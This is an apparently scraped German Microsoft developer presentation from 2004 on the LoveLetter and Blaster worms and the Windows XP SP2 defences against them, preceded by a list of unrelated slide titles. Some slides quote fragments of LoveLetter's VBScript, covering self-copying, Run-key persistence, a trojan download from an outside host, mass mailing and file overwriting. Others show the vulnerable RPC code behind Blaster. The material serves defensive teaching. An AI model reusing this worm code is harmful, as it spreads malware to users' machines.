MGB 2003 Viren, Würmer, SP2 Uwe Baumann Dirk Primbs .NET Community Evangelists Microsoft Deutschland GmbH uwebaum@microsoft.com dirkp@microsoft.com © 2004.

Slides:

Advertisements

Ähnliche Präsentationen

Be.as WEB Technologie

Advertisements

ASP.NET Tips & Tricks Uwe Baumann

SQL Server 2005.NET Integration Sebastian Weber Developer Evangelist Microsoft Deutschland GmbH.

Design- und Entwicklungswerkzeuge

Web-Entwicklung mit ASP.NET 2.0 und Visual Studio 2005 Uwe Baumann Marketing Manager Developer Tools Microsoft Deutschland GmbH Oliver Scheer Developer.

5 Security-Todsünden in der Softwareentwicklung

Web Matrix Project Kurzüberblick Dirk Primbs Technologieberater Developer Platform Strategy Group Microsoft Deutschland GmbH.

Sicherheit als Geschäftsmodell

Systemverwaltung wie es Ihnen gefällt.

7.3. Viren, Würmer, Trojaner Mail von der Nachbarin

Gefährdung durch Viren

PC I Kursdauer:3 x 3 Stunden Dozentin:Johanna Vohwinkel.

1.WICHTIG: Bringen Sie Ihr Betriebssystem möglichst "offline" auf den aktuellen Stand. Insbesondere sollten Sie bei Verwendung von Windows XP nicht ohne.

Sicher durchs Internet

Windows Vista Felix Lutz 14. August 2007.

1.WICHTIG: oBringen Sie Ihr Betriebssystem möglichst "offline" auf den aktuellen Stand. Insbesondere sollten Sie bei Verwendung von Windows XP nicht ohne.

Viren,Würmer & Trojaner

Sicherheit Quelle: Aus einem Referat der ASTALAVISTA Group

Windows Small Business Server 2008

Angriffe durch Viren, Würmer und Trojaner

Computerviren Inhaltsverzeichnis.

GERMAN 1013 Kapitel 2 3.

Michael Haverbeck System Engineer

Don`t make me think! A Common Sense Approach to Web Usability

Kooperationsmöglichkeiten im Bereich Medienkompetenzförderung Heidelberg, 06.Juni 2011 Jürgen Nilgen Area Sales Lead Germany | Microsoft Learning.

Weltweite Kommunikation mit Exchange Server über das Internet

Web Services Die Zukunft netzbasierter Applikationen iternum GmbH Alexanderstraße Frankfurt/Main

Video Streaming mit Silverlight

Präsentation von Sonja Pathe

Version 2008 Team Foundation Version Control (TFVC) … ist eine vollständige Neuentwicklung … wurde für große Teams, die auch weltweit verteilt arbeiten,

Dariusz Parys Developer Evangelist Microsoft Deutschland GmbH Christian Weyer Solutions Architect thinktecture.

Microsoft IT packt aus Alexander Ruzicka Juergen Goeler von Ravensburg

INSTANT MESSAGING LI Xiaohui LIU Miao ZHOU Guanpei Universität Salzburg WAP Präsentation WS 2005/06.

Von Patrik, Yannik, Marc und Luca

Meins & Vogel GmbH, Tel. (07153) , Sicher im Internet – Nur eine Illusion? Vortrag im Rahmen eines Info-Abends Meins und Vogel.

CALPER Publications From Handouts to Pedagogical Materials.

Viren, Würmer und anderes Ungeziefer

Partner ready ppt Software Assurance Benefits 3.5 Software Assurance Änderungen wirksam zum 11. November 2007 Katharina Hensle, Software Assurance Lead.

Präsentation von Lukas Sulzer

MTS Microsoft Transaction Server Martin Basziszta

Zero Administration Kit für Microsoft® Windows® Jörg Kramer University Support Center.

Kaseya Virtual System Administrator Produkt Update 7.0 Rocco van der Zwet Copyright ©2014 Kaseya 1.

Verbreitung von Viren, Würmern und Trojanern

Luca Argentiero Technical Specialist Microsoft Schweiz

ü Datenverlust Schadprogramme Defekte Datenträger Ursachen

Sprachneuerungen des .NET Frameworks 3.5

Schwachstellen im Netzwerk Rocco van der Zwet - Senior Consultant.

->Prinzip ->Systeme ->Peer – to – Peer

Viren, Würmer und anderes „Ungeziefer“

Mit einem Mausklick geht’s weiter

Installation, Konfiguration, Online stellen, Zugriff © by Lars Koschinski 2003.

Ralf M. Schnell Technical Evangelist Microsoft Deutschland GmbH

Christian Binder Senior Platform Strategy Manager Microsoft Deutschland GmbH.

Ralf M. Schnell Technical Evangelist Microsoft Deutschland GmbH.

Webserver einrichten mit Konfiguration, online stellen, Zugang © by Lars Koschinski 2003.

Arbeiten in einem agilen Team mit VS & TFS 11

1 Konica Minolta IT Solutions Prinzip Partnerschaft MANAGED MONITORING ÜBERWACHJUNG DER SERVERINFRASTRUKTUR UND ANWENDUNGEN DIREKT AUS DER CLOUD.

Gregor Graf Oracle Portal (Part of the Oracle Application Server 9i) Gregor Graf (2001,2002)

Arten von Hacker und Virenangriffen

Schutz vor Viren und Würmern Von David und Michael.

Arten von Viren Es gibt verschiedene Arten von Viren.

Arten von Viren Es gibt verschiedene Arten von Viren.

Es gibt verschiedene Arten von Viren. Hier haben wir einige angeführt.

Arten von Hacker und Virenangriffen:

Berliner Elektronenspeicherring-Gesellschaft für Synchrotronstrahlung m.b.H., Albert-Einstein-Straße 15, Berlin frontend control at BESSY R. Fleischhauer.

Workshop 1 Getting Started 2016 Boris Wylutzki

Azure Active Directory und Azure Active Directory Domain Services

Erweiterte Azure Dienste

OFFICE 365 FOCUS SESSION SHAREPOINT ONLINE 101:LERNE DIE BASICS 19. März 2018 Höhr-Grenzhausen.

- moodle – a internet based learning platform

Präsentation transkript:

MGB 2003 Viren, Würmer, SP2 Uwe Baumann Dirk Primbs .NET Community Evangelists Microsoft Deutschland GmbH uwebaum@microsoft.com dirkp@microsoft.com © 2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

Sicherheit ist eine der größten und wichtigsten Aufgaben, die unsere Industrie jemals angehen musste. Es geht nicht nur darum, einfach ein paar Sicherheitslöcher zu schließen und weiterzumachen. Die negativen Auswirkungen von Viren und Würmern auf ein akzeptables Niveau herunterzuschrauben erfordert ein fundamental neues Denken über Softwarequalität, ständige Verbesserungen bei Tools und Prozessen, und anhaltende Investitionen in widerstandsfähige neue Sicherheitstechnologien, die bösartigen oder zerstörerischen Code blocken, bevor Schaden entsteht [...] Der technologische Fortschritt in den letzten zwei Jahrzehnten ist unglaublich, und ist viel zu wichtig, als daß wir ein paar Kriminellen erlauben dürfen, uns davon abzuhalten, die fantastischen Errungenschaften der Technologie zu genießen. Bill Gates, 31. März 2004

Viren, Würmer, Trojaner Zwei typische Vertreter Wurm Inside LoveLetter und Blaster Wurm Inside So funktionieren LoveLetter und Blaster Harte Lektionen Warum konnte das geschehen? Aus Schaden wird man klug Hilfe, mein Code geht nicht mehr! „Kann man das auch ausschalten?“

Als die Liebe die Welt regierte Love Letter Als die Liebe die Welt regierte

16:00 Uhr Der erste Clone taucht auf („Funny Joke“) Donnerstag, 4. Mai 4:12 Uhr Antivirus-Hersteller in Europa empfangen die ersten Meldungen von Kunden und beginnen um ca. 5:00 Uhr mit der Analyse. Es wird schnell klar: Der Wurm, geschrieben in VB Script, ist nicht sehr kompliziert, aber extrem ansteckend. Mittwoch, 3. Mai 2000 Ein neuer Wurm taucht auf. Unter den ersten „Patienten“ sind Microsoft Deutschland, Lucent Technology Europa und Credit Suisse Ca. 7:00 Uhr ... in Melbourne klickt ein Mitarbeiter des Reiseführer-Verlags „Lonely Planet“ auf das Wurm-Script und verschickt den Wurm an 100 Reiseführer-Autoren in der ganzen Welt… 18:40 Uhr Viele Antivirus-Hersteller machen Virus-Definitionsfiles zum freien Download über das Web verfügbar. Dienstag, 9. Mai Virusmeldungen aus aller Welt gehen zurück. Insgesamt sind jetzt 29 Varianten im Umlauf, eine halbe Million PCs wurden infiziert. 16:00 Uhr Der erste Clone taucht auf („Funny Joke“) Mittwoch, 4. Mai 2000 13:00 Uhr Der Wurm trifft im Pentagon und bei der CIA ein. Das FBI nimmt die Ermittlungen auf. Ab 7 Uhr … und an der Ostküste der USA klicken Tausende liebeshungrige Büroangestellte nach einem frustrierenden Wochenende auf die Mail in der Hoffnung auf ein Rendez-Vouz 7:00 Uhr Antivirus-Hersteller verschicken die ersten Versionen der Virendefinition an ihre Kunden, aber es ist bereits zu spät denn… Vormittag Mitarbeiter des philippinischen Internetproviders „Sky Internet“ bemerken eine drastisch erhöhte Anzahl von Downloads auf ihren Servern. Der Wurm lädt dort einen Trojaner herunter, der Passwörter ausspioniert und an zwei eMail-Adressen versendet. Der Provider schaltet die betroffenen Server ab. Freitag, 5. Mai Mittlerweile sind 9 weitere Varianten im Umlauf, getarnt als Muttertagsmail und als Nachricht des Antiviren-Herstellers Symantec Quelle: PCWorld.com

Reproduktion Verschickt sich als Attachment an eMail-Adressen aus dem Outlook-Addressbuch des Benutzers Verschickt sich über IRC mit Hilfe des DCC Features (Direct Client-to-Client)

Aktionen Ersetzt Files mit Kopien des eigenen Codes Startet Download eines Trojaners Verschickt sich selbst über eMail Infiziert (überschreibt) Files Erstellt ein mIRC Script Verändert die Startseite des Internet Explorers

Inside LoveLetter Analyse des VBS-Skripts

Code: Selbstkopien erstellen Set wscr=CreateObject("WScript.Shell") … Set dirwin = fso.GetSpecialFolder(0) Set dirsystem = fso.GetSpecialFolder(1) Set dirtemp = fso.GetSpecialFolder(2) Set c = fso.GetFile(WScript.ScriptFullName) c.Copy(dirsystem&"\MSKernel32.vbs") c.Copy(dirwin&"\Win32DLL.vbs") c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ Run\MSKernel32",dirsystem&"\MSKernel32.vbs" RunServices\Win32DLL",dirwin&"\Win32DLL.vbs"

Code: Trojaner downloaden Randomize num = Int((4 * Rnd) + 1) if num = 1 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.skyinet.net/~young1s/[…]HJKhjnjbvYT/WINBUGSFIX.exe" elseif num = 2 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\ Start Page","http://www.skyinet.net/~angelcat/ […]skladjflfd/WIN-BUGSFIX.exe" elseif num = 3 then "http://www.skyinet.net/~koichi/[…]TRjkcbGRfF/WIN-BUGSFIX.exe" elseif num = 4 then "http://www.skyinet.net/~chu/[…]sdgfhjjgcb/WIN-BUGSFIX.exe" end if

Code: Massenmail schicken set regedit=CreateObject("WScript.Shell") set out=WScript.CreateObject("Outlook.Application") set mapi=out.GetNameSpace("MAPI") set a=mapi.AddressLists(ctrlists) x=1 for ctrentries=1 to a.AddressEntries.Count … set male=out.CreateItem(0) male.Recipients.Add(malead) male.Subject = "ILOVEYOU" male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me." male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") male.Send x=x+1 next

Code: Files infizieren set f = fso.GetFolder(folderspec) set fc = f.Files for each f1 in fc ext=fso.GetExtensionName(f1.path) ext=lcase(ext) s=lcase(f1.name) … elseif(ext="jpg") or (ext="jpeg") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close set cop=fso.GetFile(f1.path) cop.copy(f1.path&".vbs") fso.DeleteFile(f1.path) next

Das Ende vom Lied 10 Milliarden US$ Schaden (geschätzt) Unzählige Nachahmer Wahrscheinlicher Autor: Philippinischer Student Motiv: Entweder ein Versehen oder die Rache für eine zurückgewiesene Semesterarbeit Verurteilung des Autors nach damals in den Philippinen geltendem Recht nicht möglich

Lektionen aus Love Letter Love Letter vertraute darauf, daß… … der Empfänger Mailattachements öffnet wenn die Email von bekannten Absendern stammt. … der Empfänger ausreichende Rechte hat um von sich selbst Kopien in Systemverzeichnissen zu erstellen. ... Mails vollautomatisch verschickt werden können.

Maßnahmen I Hinweismeldungen von Office-Applikationen, bevor … MGB 2003 Maßnahmen I Hinweismeldungen von Office-Applikationen, bevor … … VBA-Code ausgeführt wird. … Scripts ausgeführt werden. … Outlook automatisiert werden kann. © 2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

Maßnahmen II Neue Sicherheitsoptionen für die Preview Pane in Outlook MGB 2003 Maßnahmen II Neue Sicherheitsoptionen für die Preview Pane in Outlook Ausführbare Attachements werden blockiert: Mail-Previews laufen in der „Restricted Sites“ Internet Zone © 2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

Windows XP Service Pack 2 Neue Mail-Preview für Outlook Express Zone „Local Machine“ restriktiver vorkonfiguriert Neue zentrale API zum Handling von Attachements: Attachement Execution Services (AES) Schnittstelle IAttachementExecute Zentralisiert die Risiko-Abschätzung Steuerbar über Group Policies

Bitte wenden Sie sich an Ihren Administrator  MGB 2003 Bitte wenden Sie sich an Ihren Administrator  Als Nicht-Administrator wäre es Love Letter nicht möglich gewesen, … … sich in HKLM\…\Run einzutragen. … in ein Systemverzeichnis zu schreiben. … Betriebssystembestandteile auszutauschen. © 2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

Ein Tag im Leben eines Nicht-Administrators MGB 2003 Ein Tag im Leben eines Nicht-Administrators © 2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

Das Security Problem Software Security Pendel MGB 2003 Das Security Problem Software Security Pendel Einfache Benutzung “Automagic” Alle Features sind ON by default Große Angriffsfläche Out Of The Box Experience Features Attacks Marketing Mode Usability & Features Security Privacy © 2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

Das Security Problem Software Security Pendel MGB 2003 Das Security Problem Software Security Pendel Geringe “connectivity” Viele Sicherheitsdialoge Minimierte Angriffsfläche Oft schwerer zu benutzen Nur schwer zu vermarkten Paranoid Mode Usability & Features Security Privacy © 2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

Das Security Problem Software Security Pendel MGB 2003 Das Security Problem Software Security Pendel Kleinere Angriffsfläche Weniger Sicherheits-Dialoge Transparente Einstellung Konfigurierbar Sicher handhabbar! Security & Privacy als Feature für den Anwender Optimum Usability & Features Security Privacy © 2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

Blaster Mach mal Pause!

Reproduktion Wurmcode lädt EXE-Datei „MSBLAST.EXE“ von angreifendem, bereits infizierten System und führt diese lokal aus Die EXE-Datei scannt weitere Systeme und infiziert diese mit dem Wurmcode

Aktionen Startet Denial-of-Service Angriff auf http://www.windowsupdate.com Bringt Computer zum Absturz (als Nebeneffekt)

Inside Blaster Grundlagen: Buffer Overrun Analyse der angreifbaren Stelle im Windows-Sourcecode

Buffer Overrun: Das Prinzip [1] void main() { char myLongBuffer[256]; myFunction(myBuffer); } void myFunction(char *myString) { char myShortBuffer[16]; strcpy(myShortBuffer, myString); Was passiert, wenn der übergebene String größer als 16 Zeichen ist?

Buffer Overrun: Das Prinzip [2] Stack void main() { char myLongBuffer[256]; myFunction(myLongBuffer); } Strings MyShortBuffer Gehackte Adresse MyShortBuffer 16 MyShortBuffer 16 256 void myFunction(char *myString) { char myShortBuffer[16]; strcpy(myShortBuffer, myString); } Sonstige Daten Virus ausführen Rücksprungadresse 256 MyLongBuffer Daten sind zu lang ! Rücksprung an gehackte Adresse… (bisheriger Stackinhalt) Stack Gehackte Adresse Viruscode „Böser“ Inhalt von MyShortBuffer:

Code: Blasters Angriffsziel Port 135 (Z.B. aus dem Internet) error_status_t _RemoteActivation(WCHAR *pwszObjectName, ... ) { *phr = GetServerPath(pwszObjectName, &pwszObjectName); … } HRESULT GetServerPath(WCHAR *pwszPath, WCHAR **pwszServerPath ){ WCHAR * pwszFinalPath = pwszPath; WCHAR wszMachineName[MAX_COMPUTERNAME_LENGTH_FQDN + 1]; hr = GetMachineName(pwszPath, wszMachineName); *pwszServerPath = pwszFinalPath; } HRESULT GetMachineName( WCHAR * pwszPath, WCHAR wszMachineName[MAX_COMPUTERNAME_LENGTH_FQDN + 1]) { pwszServerName = wszMachineName; LPWSTR pwszTemp = pwszPath + 2; while ( *pwszTemp != L'\\' ) *pwszServerName++ = *pwszTemp++; !!!

Ist das wirklich so einfach? Ausnützen der Sicherheitslöcher ist nicht trivial! Analyse der Verwundbarkeit Sourcecode liegt (oft) nicht vor Virenbaukästen („Kits“) helfen beim Bau einfacher Viren und Trojaner, aber… Exploits werden immer schwieriger Extrem detaillierte Kentnisse sind notwendig Unmöglich ohne viel Zeit und Wissen

Sorgen eines Hackers Sprungadresse zu eigenem Code finden „NOP-Sledge“ oder gutes Raten DLL-Funktionen aufrufen DLL-Basisadresse? Funktions-Einsprungpunkt? Prozeß abspalten Keine native Win32-Funktion verfügbar Platz für Literale ( z.B. Funktionsnamen) Hashing notwendig Keine Null im Code erlaubt Decoder-Stub nötig Grrr!

Das Ende vom Lied 5-10 Millionen US$ Schaden 8 Millionen infizierte Computer Autor immer noch nicht bekannt Einige Nachahmer vor Gericht

Lektionen aus Blaster Blaster nutzte eine Sicherheitslücke im Betriebssystem aus Aktivierte Firewalls hätten Blaster im Vorfeld verhindert, aber… … schafft es Blaster in ein Unternehmensnetzwerk, helfen nur noch Personal Firewalls auf den einzelnen Systemen Zum Zeitpunkt der Verbreitung von Blaster gab es bereits seit nahezu einem Monat einen Patch, der aber nicht rechtzeitig eingespielt worden war

Maßnahmen gegen BOs Bestimmte C/C++ Kommandos sind besonders anfällig strcpy, gets, scanf, sprintf, strcat, … BOs werden in Managed Code durch Laufzeitchecks verhindert. Compilerswitch /GC aktiviert in Visual C/C++ verbessertes Stackhandling

Nutzloses Wissen Special Bergarbeiter mit Kanarienvogel (Welsh Miner‘s Canary) Prinzip: Vogel tot = zuviel Methangas Quelle: West Virginia Office of Miners’ Health, Safety and Training

(bisheriger Stackinhalt) Compilerswitch /GC Stack void myFunction(char *myString) { char myShortBuffer[16]; strcpy(myShortBuffer, myString); } MyShortBuffer Strings MyShortBuffer 16 Security Cookie Prolog: Alloziiert Speicher auf dem Stack für lokale Variablen und speichert Zufallswert für Security Cookie (Canary) ab sub esp,24h mov eax,dword ptr [___security_cookie (408040h)] xor eax,dword ptr [esp+24h] mov dword ptr [esp+20h],eax Prolog: Alloziiert Speicher auf dem Stack für lokale Variablen sub esp,20h Rücksprungadresse 256 MyLongBuffer (bisheriger Stackinhalt) Stack Epilog: Prüft den Security Cookie (Canary) und führt anchließend Rücksprung durch mov ecx,dword ptr [esp+20h] xor ecx,dword ptr [esp+24h] add esp,24h jmp __security_check_cookie (4010B2h) Epilog: Führt Rücksprung durch add esp,20h ret

Vertrauen ist gut, Kontrolle ist besser MGB 2003 Vertrauen ist gut, Kontrolle ist besser © 2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

Patchmanagement Definition: Patch Patches beheben gefundene Security Vulnerabilities werden von Microsoft in Sicherheits-Bulletins veröffentlicht (z.B. MS03-47) Patches werden in Rollup-Packages und Service Packs zusammengefasst Vulnerabilities werden von Microsoft in 4 Schweregrade eingeteilt

Patchmanagement Enstehung des Blaster Wurms MGB 2003 Patchmanagement Enstehung des Blaster Wurms 1. Juli 03 16. Juli 03 25. Juli 03 11. August 03 Schwachstelle entdeckt / Start der Patchentwicklung Bulletin & Patch Verfügbar Bisher kein Angriff Angriffs-Code wird veröffentlicht Wurm infiziert die Welt Report Schwachstelle in RPC/DDOM aufgedeckt MS startet den höchsten Notfall-prozess Level Bulletin MS03-026 wir an Kunden ausgeliefert Kontinuierliche Kommunikation mit Analysten, Presse, Community, Partner, Regierungsbehörden Exploit X-focus (Chinesische Security-Spezialisten) veröffentlicht Angriffs-Tool MS maximiert die Anstrengungen, alle Kunden zu informieren Worm Blaster Wurm entdeckt Varianten und andere Viren schlagen gemeinsam zu (z.B. “SoBig”) Blaster zeigt das komplexe Zusammenspiel zwischen Sicherheitsforschung, Softwarehersteller und Hackern © 2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

Patchmanagement Reaktionszeit Tage zwischen Patch und Angriff Zeitspanne zwischen erscheinen des Patches und Auftreten eines Exploits sinkt Exploits werden intelligenter Ansatz Patch Management reicht nicht Neue Techniken müssen entwickelt werden 151 180 331 Blaster Welchia/ Nachi Nimda 25 SQL Slammer

Windows XP SP2 Verbessertes Patchmanagement “hot patching” Technologie MGB 2003 Windows XP SP2 Verbessertes Patchmanagement Automatische zeitgesteuerte Installation Priorisierung beim Patch-Download Reduzierte Patch-Größe mit Delta-Patching Gleiche Scanning-Engine für alle Tools “hot patching” Technologie Reduzierte Anzahl von Reboots Restart Explorer und einige SVCHOST Prozesse an statt kompletten Reboot © 2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

Windows XP SP2 Execution Protection (no-execute, NX) MGB 2003 Windows XP SP2 Execution Protection (no-execute, NX) Speicher wird als Datenspeicher markiert Der Versuch, im NX-Bereich Code auszuführen führt zu einer Exception Muß von Hardware unterstützt werden © 2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

Internet Connection Firewall MGB 2003 Internet Connection Firewall Ab SP2 ist die ICF “ON by default” Boot time protection Verbesserte Konfigurationsmöglichkeiten Group Policy, Kommandozeile Verbesserte Benutzeroberfläche Programmatisch: INetFwV4AuthorizedApplication, INetFwV4AuthorizedApplications, INetFwV4Mgr, INetFwV4Policy, INetFwV4Profile © 2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

Internet Connection Firewall II MGB 2003 Internet Connection Firewall II Drei Betriebsmodi Aktiviert (Standard) Alle eingehende Verbindungen werden blockiert, Ausnahme: Für in einer „White List“ erfasste Programme werden Ports bei Bedarf geöffnet Aktiviert - keine Ausnahmen „Shielded Mode“, es werden keine eingehenden Verbindungen zugelassen Deaktiviert © 2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

Windows XP SP2 – Weitere Änderungen MGB 2003 Windows XP SP2 – Weitere Änderungen Unterbindung von anonymen RPC-Aufrufen Neuer Registry-Key steuert das Verhalten: \\HKLM\SOFTWARE\Policies\Microsoft\Windows NT\RPC\RestrictRemoteClients RPC_RESTRICT_REMOTE_CLIENT_NONE (0) – bisheriges Verhalten RPC_RESTRICT_REMOTE_CLIENT_DEFAULT (1) – Anonyme Zugriffe werden zurückgewiesen. Standarteinstellung RPC_RESTRICT_REMOTE_CLIENT_HIGH (2) – genauso wie zuvor, mit der Ausnahme, daß das RPC_IF_ALLOW_CALLBACKS_WITH_NO_AUTH flag keine Wirkung mehr hat. DCOM: Globale Konfiguration von Zugriffsrechten Die meisten lokalen Szenarien funktionieren ohne Änderung Remote: Nur Administratoren haben by default das Recht Applikationen zu aktivieren (Activation) und zu starten (Launch) © 2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

“Security is designed to make your system not work” (Michael Howard) MGB 2003 Was tun, wenn nichts mehr geht? “Security is designed to make your system not work” (Michael Howard) © 2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

Fazit Viele Viren benutzen einfache Mechanismen um sich zu Systemen Zugang zu verschaffen Durch gezielte Maßnahmen kann die Anfälligkeit einer Applikation bzw. eines Systems deutlich gesenkt werden

© 2004 Microsoft Corporation. All rights reserved. MGB 2003 © 2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary. © 2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

Referenzen Marshall Brain: “How Stuff Works: Computer Viruses” http://www.howstuffworks.com/virus.htm Ulf Larson: „VBS.LoveLetter: A Study of the LoveLetter worm“ http://www.ce.chalmers.se/undergraduate/D/EDA261/03/oh03/oh_F05_loveletter_4pp.pdf

Referenzen Slipstick Systems : „Protecting Microsoft Outlook against Viruses“ http://www.slipstick.com/outlook/antivirus.htm Bill Gates: „Microsoft Progress Report: Security“ http://www.microsoft.com/mscorp/execmail/2004/03-31security-print.asp

Referenzen PC World: "When Love Came to Town: A Virus Investigation“ http://www.pcworld.com/news/article/0,aid,33392,00.asp XP Service Pack 2 for Developers http://msdn.microsoft.com/security/productinfo/xpsp2/default.aspx

Referenzen Microsoft Developer Security Center http://msdn.microsoft.com/security/ Microsoft Security Center http://www.microsoft.com/security/ Compiler Security Checks in Depth http://msdn.microsoft.com/library/en-us/dv_vstechart/html/vctchcompilersecuritychecksindepth.asp

Referenzen Microsoft Baseline Security Analyzer http://www.microsoft.com/technet/security/tools/mbsahome.mspx Microsoft Compatibility Toolkit (Application Verifier) http://www.microsoft.com/downloads/details.aspx?FamilyID=7fc46855-b8a4-46cd-a236-3159970fde94&displaylang=en fxCop http://www.gotdotnet.com/team/fxcop/

Referenzen Developing Software with Non-Administrative privileges http://msdn.microsoft.com/library/en-us/dv_vstechart/html/tchdevelopingsoftwareinvisualstudionetwithnon-administrativeprivileges.asp West Virginia Office for Mine Safety: Historic Photos http://www.wvminesafety.org/histphoto.html

Windows XP SP2 Firewalling MGB 2003 Windows XP SP2 Firewalling ICF “ON by default” in allen Konfigurationen LAN, Dial-Up, 3rd Party Tools (T-Online) Mehr Konfigurationsmöglichkeiten Group policy, command line, unattended setup Besseres User Interface Boot time protection Unterstützung mehrerer Profile Firmennetz vs. Heimnetzwerk © 2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

Windows XP SP2 Email-Sicherheit MGB 2003 Windows XP SP2 Email-Sicherheit API für sicheres Handling von Attachments (Attachment Execution Services) Default: Do not trust unsafe attachments! Outlook, Outlook Express, Windows Messenger, Internet Explorer verwenden diese neue API Öffnen und Ausführen von Attachments mit so wenig Privilegien wie möglich Sicheres “Message Preview” © 2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

Windows XP SP2 Internet Explorer MGB 2003 Windows XP SP2 Internet Explorer Immer Benachrichtigungen bei installierenden und ausgeführten ActiveX Controls HTML Dateien auf der lokalen Maschine sind nicht in der Lage: unsichere ActiveX Controls auszuführen auf Daten in der Local Machine Zone zuzugreifen Unbekannten und unsignierte ActiveX Controls werden geblockt In Windows XP SP2 wird Microsoft Sicherheitstechnologien zum Schutz von Clients gegen die wichtigsten Angriffsvektoren: Netzwerk, E-Mail, Browser und Speicherschutz. Windows Server 2003 SP1 werden SicherheitstechnologieN für Server und Unternehmensnetze integriert. Beim Server wird durch neue Sicherheitskonfigurationen (Härtung mittels dedizierter Serverrollen) die Angrifffläche weiter verringert. Durch Quarantänetechnologie wird nur Clients ins Netzwerk gewährt, die den definierten Sicherheitsrichtlinien entsprechen (z.B. Patchlevel oder Antivirensignatur) Weitere Details in Englisch Windows XP SP2 Improved Firewall. Windows XP will help provide better protection against network-based attacks, like Blaster, by closing unnecessary ports. This will be done through enhancements to Windows XP Internet Connection Firewall which include protection turned on by default, an improved interface that makes configuration easier, improved application compatibility when ICF is on, and enhanced enterprise administration through Group Policy. Safer e-mail and instant messaging. Windows XP will help stop viruses like SoBig.F that spread via e‑mail and instant messaging through more secure default settings, improved attachment blocking for Outlook Express and Windows Messenges and increased Outlook Express security and reliability. Safer Web browsing. Windows XP will provide improved protection against malicious content on the Web by including better protection against harmful Web downloads, better user controls to prevent malicious ActiveX controls and Spyware, and the reduced potential for IE buffer overruns. Memory protection. Some potential buffer overruns in Windows XP will be mitigated by preventing the execution of malicious code in memory normally reserved for data. Improvements include compiler checks—through recompiling core Windows binaries with /GS—to reduce stack overruns, better heap overrun protection, and support for No-Execute, a new processor innovations that helps prevent stack and heap overruns. Windows Server 2003 SP1 The difference between the server and the client is that servers need to continue listening to the network—you cant just turn off all the ports. So for server this means that we need to focus on reducing the attack surface area by locking down the default configurations by server role and we need to enable you to identify infected systems that come onto the network and separate them until they are patched/no longer infected. Role based config: Continuing the work we did on WS03 to lock down the system by turning things off by default, with role based config we will make it easier to lock down the system for ALL server roles with secure defaults. This is similar to what we did with IIS 6/0 but now applied to all server roles. Specifically, what we will deliver here is a set of templates that have customized configurations and settings by role that can be used via GPO or a wizard UI to apply these best practices. Remote access client inspection: When a user connects via a VPN to your network, you need the ability to check that system and ensure that it complies with your “security defaults. If it does not, with this new technology we will enable you to block this system from attaching to the network until it is no longer infected. This work is based on best practices that MS has developed internally for its own IT operations. Apply this to the local machines to get protection benefits for the internal network. © 2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

Windows XP SP2 Internet Explorer MGB 2003 Windows XP SP2 Internet Explorer Verbessert Behandlung von geladenen Dateien durch besseres MIME-Handling nicht passende oder fehlende MIME-Header und Dateierweiterungen werden geblockt Automatisches Öffnen von Pop-up Fenstern wird verhindert es sein denn, der Benutzer stimmt ihnen zu Verringertes UI-Spoofing © 2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

Windows XP SP2 Update-Prozess MGB 2003 Windows XP SP2 Update-Prozess Automatische zeitgesteuerte Installation Priorisierung beim Patch-Download Reduzierte Patch-Größe mit Delta-Patching Gleiche Scanning-Engine für alle Tools “hot patching” Technologie Reduzierte Anzahl von Reboots Restart Explorer und einige SVCHOST Prozesse an statt kompletten Reboot © 2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

Improved Email Security Attachment Execution Services (AES) What? OS service that protects the system from malicious attachments and prompts in low-risk scenarios Unified approach to be used by Outlook, OE, and Windows Messenger Why? Too many trust decisions being made by users Impossible to make a complete list of malicious file types Each app handles attachments differently Why should I care? If you develop an app that executes or saves email attachments your app may break

